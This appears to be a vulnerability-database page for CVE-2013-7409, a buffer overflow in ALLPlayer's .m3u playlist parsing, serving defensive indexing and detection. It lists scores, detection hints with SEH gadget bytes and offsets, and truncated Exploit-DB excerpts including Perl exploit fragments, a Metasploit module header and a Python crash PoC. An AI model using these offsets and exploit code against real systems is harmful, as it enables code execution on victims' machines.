CVE-2013-7409
published 2014-10-30CVE-2013-7409: Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.94%
99.2th percentile
Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long string in a .m3u (playlist) file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| allplayer | allplayer | <= 5.8.1 | — |
| allplayer | allplayer | — | — |
| allplayer | allplayer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x61\x62 (nSEH: POPAD + NOP, v5.6.2/5.7)
bytes↗
\x61\x50 (nSEH: POPAD + Venetian padding, v5.8.1)
bytes↗
\x11\x4d (SEH POP POP RET, ALLPlayer.exe v5.6.2)
bytes↗
\x11\x66 (SEH POP POP RET, ALLPlayer.exe v5.7)
bytes↗
\x50\x45 (SEH POP POP RET, ALLPlayer.exe v5.8.1)
- →Detect .m3u files containing a URL entry prefixed with 'http://' followed by an abnormally long string (>300 bytes) — this is the consistent exploit delivery pattern across all CVE-2013-7409 PoCs. ↗
- →ALLPlayer.exe is compiled without ASLR, Rebase, SafeSEH, or OS protections — SEH-based exploitation is reliable; monitor for SEH chain overwrites in ALLPlayer.exe process. ↗
- →Flag .m3u files with total buffer size of ~5000 bytes containing unicode-encoded shellcode (alphanumeric uppercase pattern starting with 'PPYAIAIAIAIA...'). ↗
- →The exploit triggers an access violation with EIP overwritten to 0x00410041 (unicode-expanded 'A'); monitor ALLPlayer.exe for access violations at addresses matching unicode-expanded ASCII patterns. ↗
- →Metasploit module bad characters for payload encoding include null bytes and high-range bytes; payloads will be AlphanumUnicodeMixed encoded — look for long uppercase alphanumeric strings in .m3u URL entries. ↗
- →The exploit can also be triggered via the 'Open URL' menu in ALLPlayer (not just file open); monitor for ALLPlayer.exe spawning with URL arguments containing long strings. ↗
- ·SEH gadget addresses (POP POP RET) differ per ALLPlayer version: 0x004d0011 for v5.6.2, 0x00660011 for v5.7, and \x50\x45 for v5.8.1 — detection rules using hardcoded gadget addresses must account for version-specific offsets. ↗
- ·The Metasploit module description incorrectly references 'ALLPlayer 2.8.1' in one place but the actual target is v5.8.1 on Windows 7 SP1; version strings in module metadata may be unreliable. ↗
- ·The SEH offset to overwrite is 301 bytes in v5.8.1 exploits but 303 bytes in v5.6.2/5.7 exploits — buffer size thresholds for detection should accommodate both offsets. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
exploitdb·2014-03-05
CVE-2013-7409 ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'ALLPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
ALLPlayer 2.8.1, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .M3U file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom', # Vulnerability discovery
'Mike Czumak', # Original exploit
'Gabor Seljan' # Metasploit module
],
'Reference
Exploit-DB
ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
exploitdb·2014-03-03
CVE-2013-7409 ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)
---
#-----------------------------------------------------------------------------#
# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH) #
# Date: Mar 1 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.allplayer.org/download/allplayer #
# Version: 5.8.1 #
# Tested on: Windows 7 SP1 #
#-----------------------------------------------------------------------------#
# This application is still vulnerable to a buffer overflow, caused by improper
# bounds checking of an URL given via menu or placed inside an M3U file.
#
# Credit to previous exploits:
# + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
# + http://www.exploit-db.com/exploits/28855/ by metacom
#!/usr/bin/perl
use strict;
use warnings;
Exploit-DB
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
exploitdb·2013-11-24
CVE-2013-7409 ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
---
#!/usr/bin/perl
###############################################################################
# Exploit Title: ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)
# Date: 11-23-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ALLPlayer 5.7
# Software Link: http://www.allplayer.org/download/allplayer
# Version: 5.7
# Tested On: Windows XP SP3 and Windows 7 Pro SP1
##############################################################################
my $buffsize = 5000; # sets buffer size for consistent sized payload
my $junk = "http://" . "\x41" x 303; # offset to seh
my $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nop
my $seh = "\x11\x66"; # overwrite seh with un
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
exploitdb·2013-11-12
CVE-2013-7409 ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)
---
#!/usr/bin/perl
###############################################################################
# Exploit Title: ALLPlayer 5.6.2 (.m3u) - SEH Buffer Overflow (Unicode)
# Date: 10-22-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ALLPlayer 5.6.2
# Software Link: http://www.allplayer.org/download/allplayer
# Version: 5.6.2
# Tested On: Windows XP SP3
#
# Credit to metacom for finding bug and publishing original POC
# - http://www.exploit-db.com/exploits/28855/
# Shouts to corelanc0d3r and b33f for some great unicode exploit tutorials
#
# Due to unicode conversion this is a venetian shellcode exploit
# To exploit simply open the created m3u file
#####################################
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2013-10-10
CVE-2013-7409 ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
---
Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2
2)Proof of Concept
junk = "http://"
buffer="\x41" * 5000
exploit = junk + buffer
try:
out_file = open("ALLPlayer_Poc.m3u",'w')
out_file.write(exploit)
out_file.close()
print "Exploit file created!"
except:
print "Error"
3)-(DEBUG)
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALL
Metasploit
ALLPlayer M3U Buffer Overflow
metasploit
ALLPlayer M3U Buffer Overflow
ALLPlayer M3U Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in ALLPlayer 5.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows 7 SP1.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/98283http://packetstormsecurity.com/files/123554/ALLPlayer-5.6.2-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/123986/ALLPlayer-5.6.2-SEH-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/124161/ALLPlayer-5.7-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/125519/ALLPlayer-5.8.1-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/28855http://www.exploit-db.com/exploits/29549http://www.exploit-db.com/exploits/29798http://www.exploit-db.com/exploits/32041http://www.exploit-db.com/exploits/32074http://www.securityfocus.com/bid/62926http://osvdb.org/show/osvdb/98283http://packetstormsecurity.com/files/123554/ALLPlayer-5.6.2-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/123986/ALLPlayer-5.6.2-SEH-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/124161/ALLPlayer-5.7-Buffer-Overflow.htmlhttp://packetstormsecurity.com/files/125519/ALLPlayer-5.8.1-Buffer-Overflow.htmlhttp://www.exploit-db.com/exploits/28855http://www.exploit-db.com/exploits/29549http://www.exploit-db.com/exploits/29798http://www.exploit-db.com/exploits/32041http://www.exploit-db.com/exploits/32074http://www.securityfocus.com/bid/62926
2014-10-30
Published